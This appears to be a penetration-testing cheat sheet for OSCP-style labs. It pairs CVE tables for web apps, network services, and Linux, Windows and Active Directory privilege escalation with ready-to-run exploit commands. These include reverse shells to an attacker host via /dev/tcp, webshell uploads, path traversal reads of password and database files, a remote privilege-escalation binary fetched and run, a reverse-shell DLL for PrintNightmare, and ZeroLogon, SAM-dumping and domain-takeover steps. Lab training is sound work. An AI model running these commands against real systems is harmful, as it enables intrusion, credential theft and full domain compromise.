CVE Database

Known vulnerabilities commonly encountered on OSCP-style boxes, Proving Grounds, and HackTheBox. Organized by category with version ranges, PoC links, and quick usage examples.

How to use this page:

  1. Identify the service and version on your target
  2. Find it in the table below
  3. Follow the PoC link or use the command provided

Always check SearchSploit first:

searchsploit <service> <version>
searchsploit -m <exploit_id>    # Mirror exploit to current directory

WEB APPLICATIONS

WordPress

CVE            | Affected Version                 | Description                      | PoC
CVE-2020-25213 | WP File Manager < 6.9            | Unauthenticated file upload RCE  | GitHub
CVE-2021-24145 | Modern Events Calendar < 5.16.5  | Authenticated file upload RCE    | ExploitDB
CVE-2022-0739  | BookingPress < 1.0.11            | Unauthenticated SQLi             | GitHub
CVE-2023-2732  | MStore API < 3.9.3               | Authentication bypass            | WPScan

# CVE-2020-25213 — WP File Manager unauthenticated upload
curl -F 'cmd=upload' -F 'target=l1_Lw' \
  -F 'upload[]=@shell.php' \
  http://$IP/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php
# Shell at: http://$IP/wp-content/plugins/wp-file-manager/lib/files/shell.php

Drupal

CVE           | Affected Version                        | Description                         | PoC
CVE-2018-7600 | Drupal < 7.58 / < 8.3.9                 | Drupalgeddon2 — Unauthenticated RCE | GitHub
CVE-2018-7602 | Drupal < 7.59 / < 8.5.3                 | Drupalgeddon3 — Authenticated RCE   | GitHub
CVE-2019-6340 | Drupal 8.5.x < 8.5.11 / 8.6.x < 8.6.10  | REST module deserialization RCE     | GitHub

# CVE-2018-7600 — Drupalgeddon2 (most common)
python3 drupalgeddon2.py http://$IP/

# Metasploit:
use exploit/unix/webapp/drupal_drupalgeddon2
set RHOSTS $IP
run

Joomla

CVE            | Affected Version       | Description                             | PoC
CVE-2015-8562  | Joomla 1.5 - 3.4.5     | Object injection RCE via HTTP headers   | GitHub
CVE-2017-8917  | Joomla 3.7.0           | SQLi in com_fields                      | GitHub
CVE-2023-23752 | Joomla 4.0.0 - 4.2.7   | Unauthenticated information disclosure  | GitHub

# CVE-2023-23752 — Information disclosure (leaks DB creds)
curl -s "http://$IP/api/index.php/v1/config/application?public=true" | python3 -m json.tool

# CVE-2017-8917 — SQLi
sqlmap -u "http://$IP/index.php?option=com_fields&view=fields&layout=modal&list[fullordering]=updatexml" --risk=3 --level=5 -p list[fullordering] --dbs

Apache Tomcat

CVE            | Affected Version                         | Description                     | PoC
CVE-2017-12617 | Tomcat 7.0.0-7.0.81 / 8.5.0-8.5.22       | PUT method RCE via JSP upload   | GitHub
CVE-2020-1938  | Tomcat < 9.0.31 / < 8.5.51 / < 7.0.100   | Ghostcat — AJP file read/RCE    | GitHub
CVE-2019-0232  | Tomcat 7/8/9 on Windows with CGI         | CGI servlet command injection   | ExploitDB

# CVE-2020-1938 — Ghostcat (AJP port 8009)
python3 ajpShooter.py http://$IP:8009 /WEB-INF/web.xml read

# CVE-2017-12617 — PUT method JSP upload
curl -X PUT "http://$IP:8080/shell.jsp/" -d '<%Runtime.getRuntime().exec(request.getParameter("cmd"));%>'

CMS Made Simple

CVE           | Affected Version | Description                            | PoC
CVE-2019-9053 | CMSMS < 2.2.10   | Blind SQLi — Dumps admin credentials   | GitHub

python3 cmsms_sqli.py -u http://$IP/ --crack -w /usr/share/wordlists/rockyou.txt

GitLab

CVE            | Affected Version       | Description                           | PoC
CVE-2021-22205 | GitLab 11.9 - 13.10.2  | Unauthenticated RCE via image upload  | GitHub
CVE-2023-7028  | GitLab 16.1 - 16.7.1   | Account takeover via password reset   | GitHub

# CVE-2021-22205 — Unauthenticated RCE
python3 CVE-2021-22205.py -u http://$IP -c "bash -i >& /dev/tcp/$LHOST/4444 0>&1"

Grafana

CVE            | Affected Version      | Description                          | PoC
CVE-2021-43798 | Grafana 8.0.0 - 8.3.0 | Unauthenticated arbitrary file read  | GitHub

curl --path-as-is "http://$IP:3000/public/plugins/alertlist/../../../../../../../../etc/passwd"
# Grab the database:
curl --path-as-is "http://$IP:3000/public/plugins/alertlist/../../../../../../../../var/lib/grafana/grafana.db" -o grafana.db

Jenkins

CVE               | Affected Version                  | Description                  | PoC
CVE-2024-23897    | Jenkins < 2.442 / LTS < 2.426.3   | Arbitrary file read via CLI  | GitHub
CVE-2019-1003000  | Script Security Plugin < 1.49     | Sandbox bypass RCE           | ExploitDB
CVE-2018-1000861  | Jenkins < 2.154 / LTS < 2.138.4   | Unauthenticated RCE          | GitHub

# CVE-2024-23897 — File read via CLI
java -jar jenkins-cli.jar -s http://$IP:8080/ help "@/etc/passwd"

Webmin

CVE            | Affected Version     | Description                                   | PoC
CVE-2019-15107 | Webmin 1.890 - 1.920 | Unauthenticated RCE via password_change.cgi   | GitHub
CVE-2012-2982  | Webmin < 1.590       | Authenticated RCE via file manager            | ExploitDB

# CVE-2019-15107 — Unauthenticated RCE
curl -sk "https://$IP:10000/password_change.cgi" \
  -d 'user=root&pam=&expired=2&old=id%7Cid&new1=test&new2=test'

WebLogic

CVE            | Affected Version                | Description          | PoC
CVE-2020-14882 | WebLogic 10.3.6 / 12.x / 14.x   | Unauthenticated RCE  | GitHub
CVE-2019-2725  | WebLogic 10.3.6 / 12.1.3        | Deserialization RCE  | GitHub

# CVE-2020-14882 — WebLogic unauthenticated RCE
curl "http://$IP:7001/console/css/%252e%252e%252fconsole.portal" \
  -H "cmd: id"

Magento

CVE            | Affected Version       | Description                              | PoC
CVE-2015-1397  | Magento < 1.9.2.0      | Shoplift SQLi — Create admin account     | ExploitDB
CVE-2022-24086 | Magento 2.3.x / 2.4.x  | Template injection RCE                   | GitHub

# CVE-2015-1397 — Shoplift (creates admin: forme/forme)
python2 shoplift.py http://$IP/

NETWORK SERVICES

FTP

CVE            | Affected Version           | Description                          | PoC
CVE-2011-2523  | vsftpd 2.3.4               | Backdoor — Shell on port 6200        | Metasploit
CVE-2015-3306  | ProFTPD 1.3.5              | mod_copy — Unauthenticated file copy | ExploitDB
CVE-2019-12815 | ProFTPD < 1.3.5b / 1.3.6   | mod_copy arbitrary file copy         | ExploitDB

# vsftpd 2.3.4 backdoor
nc $IP 21
USER test:)
PASS test
# Then: nc $IP 6200

# ProFTPD mod_copy
nc $IP 21
SITE CPFR /etc/passwd
SITE CPTO /var/www/html/passwd.txt

SMB / Samba

CVE           | Affected Version                          | Description                          | PoC
MS17-010      | Windows XP - Server 2016                  | EternalBlue — Unauthenticated RCE    | GitHub
CVE-2017-7494 | Samba 3.5.0 - 4.6.4                       | SambaCry — RCE via writable share    | Metasploit
MS08-067      | Windows XP / Server 2003 / Vista / 2008   | NetAPI RCE — Classic exploit         | GitHub

# MS17-010 — EternalBlue
nmap --script smb-vuln-ms17-010 -p 445 $IP
# Metasploit:
use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS $IP
run

# CVE-2017-7494 — SambaCry
use exploit/linux/samba/is_known_pipename
set RHOSTS $IP
run

SSH

CVE            | Affected Version | Description                    | PoC
CVE-2018-15473 | OpenSSH < 7.7    | Username enumeration           | GitHub
CVE-2016-20012 | OpenSSH < 8.2    | Banner-based user enumeration  | ExploitDB

# CVE-2018-15473 — Username enumeration
python3 ssh_enum.py $IP -U users.txt
# Metasploit:
use auxiliary/scanner/ssh/ssh_enumusers

SMTP

CVE            | Affected Version        | Description                                  | PoC
CVE-2019-10149 | Exim 4.87 - 4.91        | "Return of the WIZard" — Unauthenticated RCE | GitHub
CVE-2017-7692  | SquirrelMail < 1.4.22   | Authenticated RCE                            | ExploitDB

# CVE-2019-10149 — Exim RCE
python3 raptor_exim_wiz.py -t $IP -p 25 -c "bash -i >& /dev/tcp/$LHOST/4444 0>&1"

WEB SERVERS

Apache

CVE            | Affected Version       | Description                                   | PoC
CVE-2014-6271  | Bash (via Apache CGI)  | Shellshock — RCE via HTTP headers             | ExploitDB
CVE-2021-41773 | Apache 2.4.49          | Path traversal + RCE                          | GitHub
CVE-2021-42013 | Apache 2.4.50          | Path traversal + RCE (bypass of 41773 fix)    | GitHub

# Shellshock
curl -H "User-Agent: () { :; }; /bin/bash -i >& /dev/tcp/$LHOST/4444 0>&1" http://$IP/cgi-bin/script.sh

# CVE-2021-41773 — Apache path traversal + RCE
curl "http://$IP/cgi-bin/.%2e/%2e%2e/%2e%2e/etc/passwd"
curl "http://$IP/cgi-bin/.%2e/%2e%2e/%2e%2e/bin/bash" -d 'echo; id'

IIS

CVE           | Affected Version                 | Description                               | PoC
CVE-2017-7269 | IIS 6.0 (Windows Server 2003)    | WebDAV buffer overflow RCE                | GitHub
MS15-034      | IIS (HTTP.sys)                   | Integer overflow — DoS / info disclosure  | ExploitDB

# CVE-2017-7269 — IIS 6.0 WebDAV
python2 iis6_exploit.py $IP 80 $LHOST 4444
# Metasploit:
use exploit/windows/iis/iis_webdav_scstoragepathfromurl

LINUX PRIVILEGE ESCALATION

CVE            | Affected Version             | Description                            | PoC
CVE-2016-5195  | Linux Kernel < 4.8.3         | Dirty COW — Write to read-only files   | GitHub
CVE-2021-4034  | Polkit (all major distros)   | PwnKit — pkexec local root             | GitHub
CVE-2021-3156  | Sudo 1.8.2 - 1.9.5p1         | Baron Samedit — Heap overflow root     | GitHub
CVE-2022-0847  | Linux Kernel 5.8 - 5.16.11   | Dirty Pipe — Overwrite read-only files | GitHub
CVE-2022-2588  | Linux Kernel < 5.19          | Route4 use-after-free local root       | GitHub
CVE-2023-0386  | Linux Kernel < 6.2           | OverlayFS privilege escalation         | GitHub
CVE-2023-32233 | Linux Kernel < 6.4           | Netfilter nf_tables local root         | GitHub

# PwnKit (CVE-2021-4034) — Works on almost every unpatched Linux
curl -fsSL https://raw.githubusercontent.com/ly4k/PwnKit/main/PwnKit -o PwnKit
chmod +x PwnKit
./PwnKit

# Dirty COW (CVE-2016-5195)
gcc -pthread dirty.c -o dirty -lcrypt
./dirty newpassword

# Baron Samedit (CVE-2021-3156)
# Check if vulnerable:
sudoedit -s '\' $(python3 -c 'print("A"*1000)')
# Exploit:
python3 CVE-2021-3156.py

# Dirty Pipe (CVE-2022-0847)
gcc exploit.c -o exploit
./exploit /etc/passwd 1 $'\npiped:$1$piped$password:0:0::/root:/bin/bash\n'
su piped  # password: password

WINDOWS PRIVILEGE ESCALATION

CVE            | Affected Version                    | Description                             | PoC
CVE-2020-0787  | Windows 10 / Server 2016-2019       | BITS arbitrary file write → SYSTEM      | GitHub
CVE-2020-1472  | Windows Server (Netlogon)           | ZeroLogon — Domain admin in seconds     | GitHub
CVE-2021-1675  | Windows (Print Spooler)             | PrintNightmare — LPE / RCE to SYSTEM    | GitHub
CVE-2021-36934 | Windows 10 (1809+)                  | HiveNightmare — Read SAM as user        | GitHub
CVE-2022-26923 | AD Certificate Services             | Certifried — Domain user to DA          | GitHub
MS16-032       | Windows 7/8/10 / Server 2008-2012   | Secondary Logon handle privesc          | ExploitDB
MS16-098       | Windows 8.1 / Server 2012           | Kernel exploit via RGNOBJ               | ExploitDB

# PrintNightmare (CVE-2021-1675)
msfvenom -p windows/x64/shell_reverse_tcp LHOST=$LHOST LPORT=4444 -f dll -o evil.dll
impacket-smbserver share $(pwd) -smb2support
python3 CVE-2021-1675.py domain.local/user:'password'@$IP '\\$LHOST\share\evil.dll'

# ZeroLogon (CVE-2020-1472) — Resets DC machine password
python3 zerologon_tester.py DC_NAME $DC_IP
python3 cve-2020-1472-exploit.py DC_NAME $DC_IP
impacket-secretsdump -no-pass -just-dc domain.local/DC_NAME\$@$DC_IP

# HiveNightmare (CVE-2021-36934) — Copy SAM as regular user
icacls C:\Windows\System32\config\SAM
# If readable:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM .
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM .
impacket-secretsdump -sam SAM -system SYSTEM LOCAL

# MS16-032
Import-Module .\Invoke-MS16-032.ps1
Invoke-MS16-032

ACTIVE DIRECTORY

CVE                             | Affected Version           | Description                           | PoC
CVE-2020-1472                   | Windows Server (Netlogon)  | ZeroLogon — Reset DC machine account  | GitHub
CVE-2021-1675                   | Windows (Print Spooler)    | PrintNightmare — RCE as SYSTEM        | GitHub
CVE-2021-42278 + CVE-2021-42287 | AD (all versions)          | noPac — Domain user to DA             | GitHub
CVE-2022-26923                  | AD Certificate Services    | Certifried — Machine account to DA    | GitHub

# noPac (CVE-2021-42278 + CVE-2021-42287) — User to DA
python3 noPac.py domain.local/user:'password' -dc-ip $DC_IP -dc-host DC01 --impersonate administrator -dump

# Certifried (CVE-2022-26923) — Via AD CS
certipy account create -u user@domain.local -p 'password' -dc-ip $DC_IP -user machine$ -dns dc.domain.local
certipy req -u machine$@domain.local -p 'password' -dc-ip $DC_IP -ca CORP-CA -template Machine
certipy auth -pfx dc.pfx -dc-ip $DC_IP

QUICK LOOKUP WORKFLOW

When you find a service version, follow this process:

1. searchsploit <service> <version>        → Local exploit database
2. Google: "<service> <version> exploit"    → Recent PoCs
3. Check this page                          → Curated OSCP-relevant CVEs
4. GitHub search: "CVE-YYYY-XXXXX"         → Find PoC repos
5. HackTricks: book.hacktricks.wiki        → Methodology + exploits